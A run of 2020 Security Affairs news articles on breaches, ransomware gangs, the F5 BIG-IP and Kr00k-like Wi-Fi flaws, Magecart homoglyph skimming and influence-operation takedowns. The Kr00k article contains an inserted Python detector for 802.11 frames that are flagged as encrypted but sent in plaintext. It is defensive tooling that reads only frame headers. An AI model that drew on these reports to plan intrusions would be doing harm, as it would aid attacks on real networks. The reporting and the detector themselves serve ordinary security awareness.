“The internet is a weird web with devices and systems that are connected in ways that you can never predict, you might connect to a secure Wi-Fi hotspot or a cell tower, but the next hop could be a satellite link or wiretapped Ethernet cable,” Pavur concluded. “Having the right, the ability and the knowledge to encrypt your own data, and to choose to do that, is critical to protecting against this class of attack, whatever domain you think about it in.”

The Presentation Slides are available here:

Pierluigi Paganini

(SecurityAffairs – hacking, satellite)


Security Affairs newsletter Round 276

A new round of the weekly SecurityAffairs newsletter has arrived! Every week, the best security articles from Security Affairs, free in your inbox.

A critical flaw in wpDiscuz WordPress plugin lets hackers take over hosting account
FBI issued a flash alert about Netwalker ransomware attacks
Garmin allegedly paid for a decryptor for WastedLocker ransomware
QNAP urges users to update Malware Remover after QSnatch joint alert
Belarussian authorities arrested GandCrab ransomware distributor
Ghostwriter disinformation campaign aimed at discrediting NATO
Hackers stole €1.2m worth of cryptocurrency from 2gether
Havenly discloses data breach, 1.3M accounts available online
Reading the 2020 Cost of a Data Breach Report
Maze Ransomware operators published data from LG and Xerox
NetWalker ransomware operators have made $25 million since March 2020
UberEats data leaked on the dark web
US govt agencies share details of the China-linked espionage malware Taidoor
Cyber Defense Magazine – August 2020 has arrived. Enjoy it!
Exclusive: TIM’s Red Team Research finds 4 zero-days in WOWZA Streaming Engine product
Flaw in popular NodeJS ‘express-fileupload’ module allows DoS attacks and code injection
Hacker leaks passwords for 900+ Pulse Secure VPN enterprise servers
NSA releases a guide to reduce location tracking risks
FBI is warning of cyber attacks against Windows 7 systems that reached end-of-life
Hackers can abuse Microsoft Teams updater to deliver malicious payloads
Netwalker ransomware operators claim to have stolen data from Forsee Power
Did Maze ransomware operators steal 10 GB of data from Canon?
Google Threat Analysis Group took down ten influence operations in Q2 2020
Intel investigates security breach after the leak of 20GB of internal documents
Reddit massive hack: hackers defaced channels with pro-Trump messages
FBI warns of Iran-linked hackers attempting to exploit F5 BIG-IP flaw
Qualcomm and MediaTek Wi-Fi chips impacted by Kr00k-Like attacks

Pierluigi Paganini

(SecurityAffairs – cyber security, newsletter)


US OCC imposed an $80 Million fine to Capital One for 2019 hack

The US Office of the Comptroller of the Currency (OCC) has fined the credit card provider Capital One Financial Corp $80 million over its 2019 data breach.

The US Office of the Comptroller of the Currency (OCC) has imposed an $80 million fine on the credit card provider Capital One Financial Corp over its 2019 data breach. Capital One, one of the largest U.S. card issuers and financial corporations, suffered a data breach in 2019 that exposed personal information from more than 100 million credit applications.

A hacker who goes online by the handle “erratic” breached the systems at Capital One and gained access to personal information from 106 million Capital One credit applications.

Law enforcement identified and arrested the hacker behind the attack, a former software engineer at a Seattle technology company named Paige A. Thompson (33).

Paige Thompson, a transgender woman, is suspected of being the hacker behind the Capital One breach and attacks on 30 other organizations; in August 2019 she was indicted on wire fraud and computer fraud charges.

The Office of the Comptroller of the Currency (OCC) is an independent bureau within the United States Department of the Treasury that was established by the National Currency Act of 1863 and serves to charter, regulate, and supervise all national banks and thrift institutions and the federally licensed branches and agencies of foreign banks in the United States.

The OCC claims that Capital One failed to implement an appropriate risk management process before migrating its IT operations to a public cloud service.

“The OCC took these actions based on the bank’s failure to establish effective risk assessment processes prior to migrating significant information technology operations to the public cloud environment and the bank’s failure to correct the deficiencies in a timely manner.” reads the press release published by the OCC. “In taking this action, the OCC positively considered the bank’s customer notification and remediation efforts.”

The bank also failed to properly design and implement certain network security controls, adequate data loss prevention controls, and effective dispositioning of alerts.

The OCC pointed out that the internal audit conducted by Capital One failed to identify numerous control weaknesses and gaps in the cloud operating environment. The audit did not report on identified weaknesses and gaps to the Audit Committee.

The conduct of the bank was not compliant with the “Interagency Guidelines Establishing Information Security Standards” that apply to all US banks.

Thompson also accessed names, addresses, zip codes/postal codes, phone numbers, email addresses, dates of birth, and self-reported income, along with portions of credit card customer data, including:

  • Customer status data, e.g., credit scores, credit limits, balances, payment history, contact information
  • Fragments of transaction data from a total of 23 days during 2016, 2017 and 2018

The hacker accessed bank account numbers and Social Security numbers only for a limited number of customers:

  • About 140,000 Social Security numbers of our credit card customers
  • About 80,000 linked bank account numbers of our secured credit card customers

The OCC also ordered Capital One to improve its cybersecurity posture and to submit a plan to the OCC within 90 days detailing how it will do so.

Pierluigi Paganini

(SecurityAffairs – hacking, Capital One)


Homoglyph attacks used in phishing campaign and Magecart attacks

Researchers detailed a new evasive phishing technique that leverages modified favicons to inject e-skimmers and steal payment card data covertly.

Researchers from cybersecurity firm Malwarebytes have analyzed a new evasive phishing technique used by attackers in the wild in Magecart attacks. The hackers targeted visitors of several sites using typo-squatted domain names, and modified favicons to inject software skimmers used to steal payment card information.

The technique, known as a homoglyph attack, has previously been used in phishing scams in the form of IDN homograph attacks.

“The idea is simple and consists of using characters that look the same in order to dupe users,” reads the analysis published by Malwarebytes researchers. “Sometimes the characters are from a different language set or simply capitalizing the letter ‘i’ to make it appear like a lowercase ‘l’.”

The internationalized domain name (IDN) homograph attack technique has been used by a Magecart group on multiple domains to load the Inter software skimmer inside a favicon file.

The visual trick leverages the similarities between character scripts to register fraudulent domains that look like legitimate ones; attackers then trick victims into visiting them.

While analyzing homoglyph attacks, experts also found legitimate websites (e.g., “cigarpage.com”) that were compromised and injected with an innocuous loader for an icon file that loaded a copycat version of the favicon from the typo-squatted domain (“cigarpaqe[.]com”).

This favicon loaded from the homoglyph domain allowed the attackers to inject the Inter JavaScript skimmer.

Experts noticed that one of the fraudulent domains (“zoplm.com”) involved in this type of attack has been previously tied to Magecart Group 8, the crew that was behind the attacks on NutriBullet, and MyPillow.

“A fourth domain stands out from the rest: zoplm.com. This is also an homoglyph for zopim.com, but that domain has a history. It was previously associated with Magecart Group 8 (RiskIQ)/CoffeMokko (Group-IB) and was recently registered again after several months of inactivity.” continues the analysis.

“In addition, Group 8 was documented in high-profile breaches, including one that is relevant here: the MyPillow compromise. This involved injecting a malicious third-party JavaScript hosted on mypiltow.com (note the homoglyph on mypillow.com). While homoglyph attacks are not restricted to one threat actor, especially when it comes to spoofing legitimate web properties, it is still interesting to note in correlation with infrastructure reuse.”

The combination of attack techniques allows threat actors to implement layers of evasion. Code reuse poses a problem for defenders because it makes attribution of the attacks harder.

To avoid increasingly sophisticated phishing attacks, users should scrutinize the URLs of the websites they intend to visit, avoid clicking links in emails, chat messages and other publicly available content, and enable multi-factor authentication to protect their accounts from being hijacked.

Pierluigi Paganini

(SecurityAffairs – hacking, Homoglyph attacks)


Remotely hacking a Mercedes-Benz E-Class is possible, experts demonstrated

Chinese researchers discovered 19 vulnerabilities in a Mercedes-Benz E-Class, including issues that can be exploited to remotely hack it.

A team of Chinese experts from Sky-Go, the Qihoo 360 division focused on car hacking, discovered 19 vulnerabilities in a Mercedes-Benz E-Class, including some issues that can be exploited by attackers to remotely hack a vehicle.

The experts analyzed a Mercedes-Benz E-Class model because it is a connected car with a powerful infotainment system offering a rich set of functionalities.

The research began in 2018, and in August 2019 the experts reported their findings to Daimler, which owns the Mercedes-Benz brand. In December 2019, the carmaker announced a partnership with the 360 Group to strengthen car IT security across the industry.

“In 2018, we begin research on Mercedes-Benz, since it is one of the most famous car brands in the world and an industry benchmark in the automotive industry. We analyze the security of Mercedes-Benz cars. There are so many models from Mercedes-Benz, and we finally chose the research target on Mercedes-Benz E-Class, since the E-Class’s in-vehicle infotainment system has the most connectivity functionalities of all.” reads the research paper.

Last week, during the Black Hat cybersecurity conference, representatives of Sky-Go and Daimler disclosed the findings of their research. The experts refrained from publicly disclosing technical details of the issues to prevent malicious exploitation in the wild.

The team of experts was able to exploit the flaws to remotely unlock the doors and start the engine of a Mercedes-Benz E-Class. According to the experts, the flaws could have affected 2 million vehicles in China alone.

The experts initially collected relevant information about the target devices, such as network topology, pin definitions, chip models, and enable signals in the car. They then disassembled the center panel of the car to analyze the wiring connections between the Electronic Control Units (ECUs).


By analyzing the file system of the vehicle’s Telematics Control Unit (TCU), to which they gained access by obtaining an interactive shell with root privileges, they uncovered passwords and certificates for the backend server.

“If we have to debug the TCU client programs dynamically, we need to tamper the filesystem to get an interactive shell with ROOT privileges.” continues the research.

The researchers were also able to gain access to backend servers by analyzing the vehicle’s embedded SIM (eSIM) card used for the external connectivity.

“Car Backend is the core of Connected Cars. As long as Car Backends’ services can be accessed externally, it means that car backend is at risk of being attacked. The vehicles connecting to this Car Backend are in danger, too. So, our next step is to try to access Car Backend.” continues the research. “For accessing the APN networks of backend, one possibility would be using the e-sim of car-parts since the sim account wouldn’t log out automatically. After tearing down this eSIM, we put it into the 4G router.”

Experts noticed the lack of authentication between the backend servers and the “Mercedes me” mobile app, which allows users to remotely control multiple functions of the car. The researchers explained that once they had access to the backend, they could control any car in China.

The experts said that they did not manage to hack any critical safety functions of the tested vehicles.

“During the research and joint workshop, we see so many security designs in Mercedes-Benz Connected Cars and these designs are protecting the cars from various attacks.” the paper concluded. “The capability of a car company to work jointly with researchers contributes to the overall security of our cars.”

Pierluigi Paganini

(SecurityAffairs – hacking, Mercedes)


FBI warns of Iran-linked hackers attempting to exploit F5 BIG-IP flaw

According to the FBI, Iranian hackers are actively attempting to exploit an unauthenticated RCE flaw, tracked as CVE-2020-5902, in F5 Big-IP ADC devices.

The FBI is warning of Iranian hackers actively attempting to exploit an unauthenticated remote code execution flaw (CVE-2020-5902) affecting F5 Big-IP application delivery controller (ADC) devices.

In early June, researchers at F5 Networks addressed the CVE-2020-5902 vulnerability, which resides in undisclosed pages of the Traffic Management User Interface (TMUI) of the BIG-IP product.

The BIG-IP product is an application delivery controller (ADC) used by government agencies and major businesses, including banks, service providers and IT giants like Facebook, Microsoft and Oracle.

F5 Networks says the BIG-IP devices are used on the networks of 48 companies included in the Fortune 50 list.

Immediately after the disclosure of the issue, the US Cyber Command posted a message on Twitter urging organizations using the F5 product to patch their installations immediately.

The vulnerability could be exploited by attackers to gain access to the TMUI component and execute arbitrary system commands, disable services, execute arbitrary Java code, create or delete files, and potentially take over the BIG-IP device.

The CVE-2020-5902 vulnerability received a CVSS score of 10 and is quite easy to exploit: an attacker only needs to send a specially crafted HTTP request to the server hosting the Traffic Management User Interface (TMUI) utility used for BIG-IP configuration.

Immediately after the public disclosure of the flaw, several proof-of-concept (PoC) exploits were released, some of them very easy to use.

A few days after the disclosure of the vulnerability in the F5 Networks BIG-IP product, threat actors started exploiting it in attacks in the wild. Threat actors exploited the CVE-2020-5902 flaw to obtain passwords, create web shells, and infect systems with various malware.

US CISA launched an investigation into potential compromises in multiple sectors with the support of several entities and confirmed two compromises.

“As early as July 6, 2020, CISA has seen broad scanning activity for the presence of this vulnerability across federal departments and agencies—this activity is currently occurring as of the publication of this Alert.” continues the alert.

This week, the FBI issued a Private Industry Notification (PIN) to warn that Iran-linked threat actors have been attempting to exploit the flaw since early July 2020. The PIN also includes indicators of compromise (IOCs) and Tactics, Techniques and Procedures (TTPs) associated with the attackers.

According to the FBI, Iranian nation-state hackers could exploit the flaw in F5 Big-IP ADC devices to gain access to target networks, exfiltrate sensitive information, steal credentials, and drop several types of malware, including ransomware.

The FBI PIN is based on the analysis of the group’s previous TTPs, which suggests the hackers will attempt to exploit the CVE-2020-5902 vulnerability to compromise unpatched F5 Big-IP ADC devices used by organizations in many industries.

The same threat actors were behind multiple attacks targeting unpatched VPN devices since August 2019, such as Pulse Secure VPN servers and Citrix ADC/Gateway.

The FBI is also warning private industry organizations that Iranian hackers use web shells to establish persistent access to compromised networks and to regain access even after the systems have been patched following a cyber attack.

Experts also observed that the threat actors leverage post-exploitation tools such as Mimikatz and network reconnaissance tools.

Administrators are advised to use F5’s CVE-2020-5902 IoC Detection Tool to detect potential compromise within their infrastructure.

Below is the list of recommendations for organizations to mitigate their exposure to attacks exploiting the CVE-2020-5902 vulnerability:

• Quarantine or take offline potentially affected systems
• Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections
• Deploy a CISA-created Snort signature to detect malicious activity (available in the alert under Detection Methods)

In case organizations find evidence of CVE-2020-5902 exploitation, they are urged to implement the following recovery measures for the compromised systems:

• Reimaging compromised hosts
• Provisioning new account credentials
• Limiting access to the management interface to the fullest extent possible
• Implementing network segmentation

“CISA expects to see continued attacks exploiting unpatched F5 BIG-IP devices and strongly urges users and administrators to upgrade their software to the fixed versions,” the agency concludes.

“CISA also advises that administrators deploy the signature included in this Alert to help them determine whether their systems have been compromised.”

Pierluigi Paganini

(SecurityAffairs – hacking, F5 BIG-IP)


Qualcomm and MediaTek Wi-Fi chips impacted by Kr00k-Like attacks

Wi-Fi chips manufactured by Qualcomm and MediaTek are impacted by vulnerabilities similar to the Kr00k issue disclosed early this year.

Earlier this year, experts from ESET disclosed Kr00k, a high-severity hardware vulnerability that affects Wi-Fi chips manufactured by Broadcom and Cypress.

The Kr00k vulnerability, tracked as CVE-2019-15126, could be exploited by nearby attackers to intercept and decrypt some wireless network packets transmitted over the air by a vulnerable device.

The attacker could exploit the Kr00k issue even when not connected to the victim’s wireless network; the vulnerability affects devices using the WPA2-Personal or WPA2-Enterprise protocols with AES-CCMP encryption.


An attacker could exploit the Kr00k vulnerability after forcing a device to disconnect (disassociate) from a Wi-Fi network.

Experts pointed out that the vulnerability does not reside in the Wi-Fi encryption protocol, instead, the issue is related to the way some chips implemented the encryption. Researchers pointed out that communications protected by TLS cannot be recovered by exploiting this vulnerability.

The flaw doesn’t affect modern devices using the WPA3 protocol.

Both Broadcom and Cypress addressed the flaw by releasing security patches. Impacted products included devices from Amazon, Apple, Asus, Huawei, Google, Samsung, and Xiaomi.

Wi-Fi chips from Qualcomm, Ralink, Realtek and MediaTek are not impacted by the Kr00k issue, but unfortunately, ESET experts discovered that they are affected by similar flaws.

Qualcomm Wi-Fi chips are impacted by a vulnerability tracked as CVE-2020-3702: the attacker could steal sensitive data after triggering a disassociation. Unlike in Kr00k attacks, the attacker cannot access all of the encrypted data, because the process does not use a single all-zero key for encryption.

“One of the chips we looked at, aside from those from Broadcom and Cypress, was by Qualcomm. The vulnerability we discovered (which was assigned CVE-2020-3702) was also triggerable by a disassociation and led to undesirable disclosure of data by transmitting unencrypted data in the place of encrypted data frames – much like with KrØØk. The main difference is, however, that instead of being encrypted with an all-zero session key, the data is not encrypted at all (despite the encryption flags being set).” reads the analysis published by ESET.
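The Qualcomm variant has a symptom a defender can check for in a capture of their own device's traffic: a data frame whose Protected Frame flag is set but whose body, after the CCMP header, starts with the LLC/SNAP header (AA AA 03 00 00 00) that every plaintext data frame begins with. The parser below is an added example written for this page, not ESET's test script; it works on raw 802.11 data frames as a monitor-mode capture would deliver them, and the frames it checks are constructed samples. The original Kr00k case (all-zero session key) is not detectable this way, because there the payload really is AES-CCM ciphertext and only a CCMP decryption attempt under the zero key would reveal it.

```python
"""Spot 802.11 data frames that claim to be protected but carry plaintext.

Added example, not ESET's script.  It reads the Protected Frame flag, skips
the MAC header and the CCMP header, and checks whether the "encrypted"
payload starts with an LLC/SNAP header.  That is the symptom of the
Qualcomm CVE-2020-3702 variant described above; the all-zero-key Kr00k case
needs a CCMP decrypt attempt instead.  All frames here are constructed.
"""
from collections import Counter

LLC_SNAP = bytes.fromhex("aaaa03000000")   # DSAP, SSAP, control, OUI 00:00:00
CCMP_HEADER_LEN = 8
PROTECTED_FLAG = 0x40                       # Frame Control byte 1, bit 6
TO_DS, FROM_DS = 0x01, 0x02                 # Frame Control byte 1, bits 0 and 1


def mac_header_len(fc0: int, fc1: int) -> int:
    """Length of the MAC header of a data frame with these Frame Control bytes."""
    length = 24                                  # FC, duration, addr1-3, sequence control
    if fc1 & TO_DS and fc1 & FROM_DS:
        length += 6                              # addr4 present (WDS / 4-address frames)
    subtype = (fc0 >> 4) & 0x0F
    if subtype & 0x08:                           # QoS data subtypes carry a QoS control field
        length += 2
    return length


def check_frame(frame: bytes) -> str:
    """Classify one raw 802.11 frame (no radiotap header)."""
    if len(frame) < 24:
        return "too_short"
    fc0, fc1 = frame[0], frame[1]
    if (fc0 >> 2) & 0x03 != 2:                   # frame type 2 = data
        return "not_data"
    if not fc1 & PROTECTED_FLAG:
        return "unprotected"                     # plaintext by design (open network)
    body = frame[mac_header_len(fc0, fc1):]
    if len(body) < CCMP_HEADER_LEN + len(LLC_SNAP):
        return "too_short"
    ccmp = body[:CCMP_HEADER_LEN]
    if not ccmp[3] & 0x20:                       # ExtIV bit is always set for CCMP
        return "malformed_ccmp_header"
    payload = body[CCMP_HEADER_LEN:]
    if payload.startswith(LLC_SNAP):
        return "protected_but_plaintext"         # the Kr00k-like leak
    return "protected_ciphertext"


def scan(frames) -> dict:
    """Count verdicts over a capture; repeated 'protected_but_plaintext' hits mean the device leaks."""
    return dict(Counter(check_frame(f) for f in frames))


def build_frame(*, protected: bool, payload: bytes, qos: bool = False) -> bytes:
    """Construct a minimal FromDS data frame for testing (addresses are placeholders)."""
    subtype = 0x08 if qos else 0x00
    fc0 = (2 << 2) | (subtype << 4)              # type data, chosen subtype
    fc1 = FROM_DS | (PROTECTED_FLAG if protected else 0)
    header = bytes([fc0, fc1]) + b"\x00\x00"     # duration
    header += bytes.fromhex("ffffffffffff")      # addr1: destination
    header += bytes.fromhex("020000000001")      # addr2: BSSID (locally administered)
    header += bytes.fromhex("020000000002")      # addr3: source
    header += b"\x10\x00"                        # sequence control
    if qos:
        header += b"\x00\x00"
    body = b""
    if protected:
        body += bytes([0x01, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00])  # PN=1, KeyID 0, ExtIV set
    return header + body + payload


# Constructed samples: the start of a plaintext IPv4 packet, and bytes standing in
# for real CCMP ciphertext (anything that does not begin with LLC/SNAP).
PLAINTEXT_IPV4 = LLC_SNAP + bytes.fromhex("0800") + bytes.fromhex("450000540000400040017b3ac0a80102c0a80101")
OPAQUE = bytes.fromhex("9f3ac27e110b5d6ee4a0c1378b2f0d55e9a17c34")

SAMPLE_LEAK = build_frame(protected=True, payload=PLAINTEXT_IPV4)            # flag set, data in clear
SAMPLE_QOS_LEAK = build_frame(protected=True, payload=PLAINTEXT_IPV4, qos=True)
SAMPLE_ENCRYPTED = build_frame(protected=True, payload=OPAQUE)
SAMPLE_OPEN = build_frame(protected=False, payload=PLAINTEXT_IPV4)

if __name__ == "__main__":
    print(scan([SAMPLE_LEAK, SAMPLE_QOS_LEAK, SAMPLE_ENCRYPTED, SAMPLE_OPEN]))
```

Real ciphertext starts with AA AA 03 by chance about once in 16 million frames, so treat a single hit as noise and a burst of hits right after a disassociation as the finding. The check only reads header fields and the first six payload bytes, so it can run over a live capture without any keys.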

The ESET researchers discovered that the issue affects some of the devices they tested, including D-Link DCH-G020 Smart Home Hub and the Turris Omnia wireless router. This means that any other unpatched devices using the vulnerable Qualcomm chipsets will also be vulnerable.

Qualcomm addressed the issue by releasing a security patch for its proprietary driver in July, but experts pointed out that some devices use open-source Linux drivers and it’s not clear if those will be patched as well.

Experts found a similar issue affecting MediaTek Wi-Fi chips, which transmit the affected data without any encryption at all. The impacted chips are used in Asus routers and even in the Microsoft Azure Sphere development kit.

“One of the affected devices is the ASUS RT-AC52U router. Another one is the Microsoft Azure Sphere development kit, which we looked into as part of our Azure Sphere Security Research Challenge partnership.” continues the research.

“Azure Sphere uses MediaTek’s MT3620 microcontroller and targets a wide range of IoT applications, including smart home, commercial, industrial and many other domains.”

MediaTek released patches in March and April, while the Azure Sphere OS was patched in July.

ESET experts have released a script that could allow users to determine if a device is vulnerable to Kr00k or similar attacks.

Pierluigi Paganini

(SecurityAffairs – hacking, Kr00k)

The post Qualcomm and MediaTek Wi-Fi chips impacted by Kr00k-Like attacks appeared first on Security Affairs.

Reddit massive hack: hackers defaced channels with pro-Trump messages

Reddit suffered a massive hack, threat actors compromised tens of Reddit channels and defaced them showing messages in support of Donald Trump’s campaign.

Reddit suffered a massive hack: threat actors defaced tens of channels to display messages in support of Donald Trump’s reelection campaign.

At the time of writing, the massive hack is still ongoing and Reddit’s security team is working to restore the operations.

Below a list containing some of the impacted subreddits, some of them having tens of millions of members:

According to Reddit, the hacker compromised several subreddit moderator accounts.

Owners of channels facing security issues can report problems in the Reddit ModSupport thread; in the meantime, they are advised to enable two-factor authentication (2FA) on their accounts and to change their passwords.

Indicators of compromise for the Reddit moderator accounts are:

• the moderator received an email notification that the password and/or email address on the account changed, but did not request the change
• the moderator notices authorized apps on the profile that they do not recognize
• the moderator notices unusual IP history on the account activity page
• the moderator sees votes, posts, comments, or moderation actions that they do not remember making, or private messages that they do not remember sending

One of the moderators whose account was compromised published the details of the actions the attackers performed with his account.

“Help! I’ve been hacked by some bizarre pro-trump bot! It wrecked my subreddit’s style sheet, deleted all mods below me, updated the wiki… I’m in way over my head. What can I do? PSA: Change your passwords and enable 2-factor authentication!” reads the title of the discussion.

Once the attacker took control of the moderator’s account, they changed the subreddit’s CSS stylesheet, deleted all moderators with fewer permissions than the compromised account, and changed the community’s wiki.

Finally, the hacker published the message: “We Stand With Donal Trump #MIGA2020.”

The Twitter account https://twitter.com/advanceHCAjobs claimed responsibility for the massive Reddit hack, but the account has since been suspended. While the hackers were targeting subreddits, they were asking Twitter users to vote on which ones to hit next.

Source: BleepingComputer

In June, Reddit banned a channel of President Trump supporters, r/The_Donald, after it received reports of harassment, bullying, and threats of violence.

Pierluigi Paganini

(SecurityAffairs – hacking, Trump)

The post Reddit massive hack: hackers defaced channels with pro-Trump messages appeared first on Security Affairs.

Did Maze ransomware operators steal 10 GB of data from Canon?

An internal memo confirms that the prolonged outage suffered by Canon last week was caused by a ransomware infection, Maze operators took credit for it.

According to an internal memo obtained by ZDNet, the recent outage of Canon was caused by a ransomware attack, while Maze ransomware operators are taking the credit for the incident.

The memo also reveals that the company has hired an external security firm to investigate the incident.

The problem was first reported by Bleepingcomputer, which tracked a suspicious outage on Canon’s image.canon cloud photo and video storage service. According to the media outlet, the alleged incident resulted in the loss of data for users of their free 10GB storage feature.

The image.canon site suffered an outage on July 30th, 2020, that lasted for six days, until August 4th.

At the time the company only confirmed an internal investigation on a problem related to “10GB of data storage.”

According to Canon, some of the photo and image files saved prior to June 16 were “lost,” but it pointed out that they were not exposed in a data leak.

“Currently, the still image thumbnails of these lost image files can be viewed but not downloaded or transferred,” reads the notice issued by Canon. “If a user tries to download or transfer a still image thumbnail file, an error may be received.”

At the same time, the company issued an internal memo that warned employees of “company-wide” IT issues, which also impacted email systems. 

Maze ransomware operators announced that they had stolen 10TB of data as a result of a ransomware attack against the company, but denied responsibility for the image.canon issues. If confirmed, this means that the outage was not caused by the ransomware infection, but that Maze operators nevertheless exfiltrated 10 GB of data from the company. Another memo sent to the employees specifically refers to a “ransomware incident” and reveals that Canon has hired a cyber forensics firm to investigate the intrusion.

Maze ransomware operators recently published internal data from LG and Xerox after the companies did not pay the ransom.

As usual, the Maze ransomware operators threaten to leak the victims’ data online unless they pay the ransom.

Maze ransomware operators have also breached the systems of the Xerox Corporation and stolen files before encrypting them.

In the past months, the Maze ransomware gang breached the US chipmaker MaxLinear and Threadstone Advisors LLP, a US corporate advisory firm specialising in mergers and acquisitions.

Maze operators have been very active during the past months: they have also stolen data from the US military contractor Westech and the ST Engineering group, and they have released credit card data stolen from the Bank of Costa Rica (BCR), threatening to leak further lots every week.

Previous victims of the ransomware gang include IT services firms Cognizant and Conduent.

Pierluigi Paganini

(SecurityAffairs – hacking, Maze ransomware)

The post Did Maze ransomware operators steal 10 GB of data from Canon? appeared first on Security Affairs.

Intel investigates security breach after the leak of 20GB of internal documents

Intel is investigating reports of an alleged hack that resulted in the theft and leak of 20GB of data coming from the chip giant.

Intel is investigating reports that an alleged hacker has leaked 20GB of data exfiltrated from its systems. The stolen data includes source code, developer documents and tools; some documents are labeled as “confidential” or “restricted secret.”

The hackers shared the documents on the file-sharing site MEGA.

The leak was first published by Till Kottmann, a Swiss software engineer who manages a very popular Telegram channel on data leaks. In the past, he shared data from several leaks at major companies including Microsoft, Adobe, GE, Disney, AMD, Lenovo, Motorola, Qualcomm, Mediatek, and Nintendo.

The engineer received the files from an anonymous hacker who claimed to have breached the company earlier this year; the experts believe that this leak is just the first lot of a larger collection.

Several media outlets independently analyzed the data leak and verified the authenticity of the data.

“Per our analysis, the leaked files contained Intel intellectual property respective to the internal design of various chipsets. The files contained technical specs, product guides, and manuals for CPUs dating back to 2016.” reported ZDNet.

A company spokesperson told SecurityWeek that the data appears to come from the Intel Resource and Design Center, which manages information for use by Intel’s customers, partners and other external parties.

Below is a list of the content included in the leak:

  • Intel ME Bringup guides + (flash) tooling + samples for various platforms
  • Kabylake (Purley Platform) BIOS Reference Code and Sample Code + Initialization code (some of it as exported git repos with full history)
  • Intel CEFDK (Consumer Electronics Firmware Development Kit (Bootloader stuff)) SOURCES
  • Silicon / FSP source code packages for various platforms
  • Various Development and Debugging Tools
  • Simics Simulation for Rocket Lake S and potentially other platforms
  • Various roadmaps and other documents
  • Binaries for Camera drivers Intel made for SpaceX
  • Schematics, Docs, Tools + Firmware for the unreleased Tiger Lake platform
  • Kabylake FDK training videos
  • Intel Trace Hub + decoder files for various Intel ME versions
  • Elkhart Lake Silicon Reference and Platform Sample Code
  • Debug BIOS/TXE builds for various Platforms
  • Bootguard SDK (encrypted zip)
  • Intel Snowridge / Snowfish Process Simulator ADK
  • Various schematics
  • Intel Marketing Material Templates (InDesign)

The good news is that the leaked files do not contain sensitive data about customers or employees of the chip maker.

Pierluigi Paganini

(SecurityAffairs – hacking, data leak)

The post Intel investigates security breach after the leak of 20GB of internal documents appeared first on Security Affairs.

Google Threat Analysis Group took down ten influence operations in Q2 2020

Google published its second Threat Analysis Group (TAG) report which reveals the company has taken down ten coordinated operations in Q2 2020.

Google has published its second Threat Analysis Group (TAG) report, a bulletin that includes coordinated influence operation campaigns tracked in Q2 of 2020.

Google revealed that it took down ten coordinated operations in Q2 2020 (between April and June 2020); the campaigns were traced back to China, Russia, Iran, and Tunisia.

The report is based on the investigations conducted by the Threat Analysis Group (TAG) and on third-party contributions (e.g. the social media analysis firm Graphika, the cyber-security firm FireEye, and the Atlantic Council investigation unit).

The latest TAG Bulletin covers influence ops takedowns that have taken place in the second quarter of this year, between April and June 2020.

In April, as part of a campaign carried out by Iran-linked threat actors, Google closed 16 YouTube channels, 1 advertising account and 1 AdSense account. The accounts were linked to the Iranian state-sponsored International Union of Virtual Media (IUVM) network, which also shared content in Arabic related to the US’ response to COVID-19 and the relationship of the US with Saudi Arabia.

Google also terminated 15 YouTube channels and 3 blogs as part of a campaign carried out by Russia-linked threat actors, which posted content in English and Russian about the EU, Lithuania, Ukraine, and the US.

The Threat Analysis Group terminated another campaign from Russia: the IT giant closed 7 YouTube channels used to share content in Russian, German, and Farsi about Russian and Syrian politics and the U.S. response to COVID-19.

The TAG team also dismantled another campaign conducted by China-linked attackers. The experts terminated 186 YouTube channels, but only a subset was used to post political content primarily in Chinese, criticizing the response of the US government to the COVID-19 pandemic.

Another campaign blocked by Google leveraged 3 YouTube channels used by Iran-linked hackers to publish content in Bosnian and Arabic that was critical of the U.S. and the People’s Mujahedin Organization of Iran (PMOI), a militant organization fighting against the official Iranian government.

In May the TAG blocked 1,098 YouTube channels used by China-linked hackers to criticize the US’ response to the COVID-19 pandemic.

Google also terminated 47 YouTube channels and 1 AdSense account linked to Russia and used to spread content about domestic Russian and international policy issues.

In June, Google terminated 1,312 YouTube channels used by China-linked threat actors for the same purposes as the campaigns reported in April and May.

In the same month, Google terminated 17 YouTube channels linked to Russia, as well as 3 Google Play developers and 1 advertising account linked to the Tunisian PR company Ureputation.

Pierluigi Paganini

(SecurityAffairs – hacking, Google Threat Analysis Group)

The post Google Threat Analysis Group took down ten influence operations in Q2 2020 appeared first on Security Affairs.

Netwalker ransomware operators claim to have stolen data from Forsee Power

Netwalker ransomware operators breached the networks of Forsee Power, a well-known player in the electromobility market.

A new company has been added to the list of victims of the Netwalker ransomware operators: Forsee Power, which provides advanced lithium-ion battery systems for any mobility application.

The industrial group is based in France and in the USA; it is one of the market leaders in Europe, Asia, and North America, with annual revenue of around $65 million and over 200 employees.

Recently, the Cyble threat research group came across another disclosure from the Netwalker group, which announced that it had stolen sensitive data from Forsee Power.

Netwalker ransomware operators announced the attack with a message posted on their online blog and shared a few screenshots as proof of the security breach.

One of the images shared by the group shows a directory containing folders such as Accounts Receivable, Finance, collection letters, Expenses, and Employees. 

Below are some tips on how to prevent ransomware attacks, provided by Cyble:

  • Never click on unverified/unidentified links
  • Do not open untrusted email attachments
  • Only download from sites you trust
  • Never use unfamiliar USBs
  • Use security software and keep it updated
  • Backup your data periodically
  • Isolate the infected system from the network
  • Use mail server content scanning and filtering
  • Never pay the ransom.

Recently the FBI has issued a security alert about Netwalker ransomware attacks targeting U.S. and foreign government organizations.

The feds recommend that victims not pay the ransom and report incidents to their local FBI field offices.

The flash alert also includes indicators of compromise for the Netwalker ransomware along with mitigations.

The FBI warns of a new wave of Netwalker ransomware attacks that began in June; the list of victims includes the UCSF School of Medicine and the Australian logistics giant Toll Group.

The Netwalker ransomware operators have been very active since March and also took advantage of the ongoing COVID-19 outbreak to target organizations.

The threat actors initially leveraged phishing emails delivering a Visual Basic Scripting (VBS) loader, but since April 2020, Netwalker ransomware operators began exploiting vulnerable Virtual Private Network (VPN) appliances, user interface components in web apps, or weak passwords of Remote Desktop Protocol connections to gain access to their victims’ networks.

Recently the Netwalker ransomware operators were looking for new collaborators that can provide them with access to large enterprise networks. 

Below are the recommended mitigations provided by the FBI:

  • Back-up critical data offline.
  • Ensure copies of critical data are in the cloud or on an external hard drive or storage device.
  • Secure your back-ups and ensure data is not accessible for modification or deletion from the system where the data resides.
  • Install and regularly update anti-virus or anti-malware software on all hosts.
  • Only use secure networks and avoid using public Wi-Fi networks.
  • Consider installing and using a VPN.
  • Use two-factor authentication with strong passwords.
  • Keep computers, devices, and applications patched and up-to-date.

Pierluigi Paganini

